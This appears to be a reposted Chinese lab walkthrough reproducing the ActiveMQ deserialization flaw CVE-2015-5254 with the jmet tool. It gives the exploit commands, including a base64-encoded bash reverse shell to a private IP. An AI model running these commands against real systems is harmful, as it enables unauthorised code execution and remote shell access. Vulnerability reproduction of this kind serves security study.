ActiveMQ反序列化漏洞(CVE-2015-5254)复现

Posted

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了ActiveMQ反序列化漏洞(CVE-2015-5254)复现相关的知识,希望对你有一定的参考价值。

简介: Apache ActiveMQ是Apache软件基金会所研发的一套开源的消息中间件,它支持Java消息服务,集群,Spring Framework等。Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程***者可借助特制的序列化的Java消息服务(JMS)ObjectMessage对象利用该漏洞执行任意代码。

1.首先在kali里面执行以下命令:

cd var/opt  

wget https://github.com/matthiaskaiser/jmet/releases/download/0.1.0/jmet-0.1.0-all.jar

mkdir external

技术图片

2.输入:

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/sucess" -Yp ROME 192.168.199.120 61616


注释:-Q指定队列消息名,-I指定JMS客户端,这里是ActiveMQ,-Y指定具体的命令,-Yp指定payload类型,其后分别是ActiveMQ所在机器的ip及工作端口


技术图片

3.现在会给目标的ActiveMQ添加一个名为事件的队列,可以我们通过http://192.168.199.120:8161/admin/browse.jsp?JMSDestination=event看到这个队列中所有消息
技术图片
4.点击消息可触发命令执行
技术图片
5.然后使用反弹shell的命令输入:
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "bash -c {echo,YmFzaCAtaSA+Ji9kZXYvdGNwLzE5Mi4xNjguMTk5LjEwOS84ODg4IDA+JjE=}|{base64,-d}|{bash,-i}" -Yp ROME 192.168.199.120 61616

前面是输入自己的IP后进行的编码 后面是输入被***者的IP

技术图片

技术图片
6.执行完以后会出现一个序号 然后再主页里面触发 在进行监听就可以了
技术图片

以上是关于ActiveMQ反序列化漏洞(CVE-2015-5254)复现的主要内容,如果未能解决你的问题,请参考以下文章

ActiveMQ反序列化漏洞(CVE-2015-5254)复现

ActiveMQ反序列化漏洞(CVE-2015-5254)复现

漏洞复现 - ActiveMQ反序列化漏洞(CVE-2015-5254)

常见Java库漏洞汇总

如何查出漏洞weblogic java反序列化漏洞补丁存在绕过风险

【CVE-2016-4437】Shiro反序列化漏洞复现